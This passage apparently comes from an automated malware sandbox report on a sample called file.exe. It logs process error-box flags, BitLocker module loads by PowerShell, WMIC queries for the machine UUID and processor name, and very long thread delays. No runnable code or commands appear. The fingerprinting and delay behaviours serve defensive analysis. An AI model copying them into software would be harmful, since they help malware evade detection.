              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4479Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5393Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6669Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2923Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
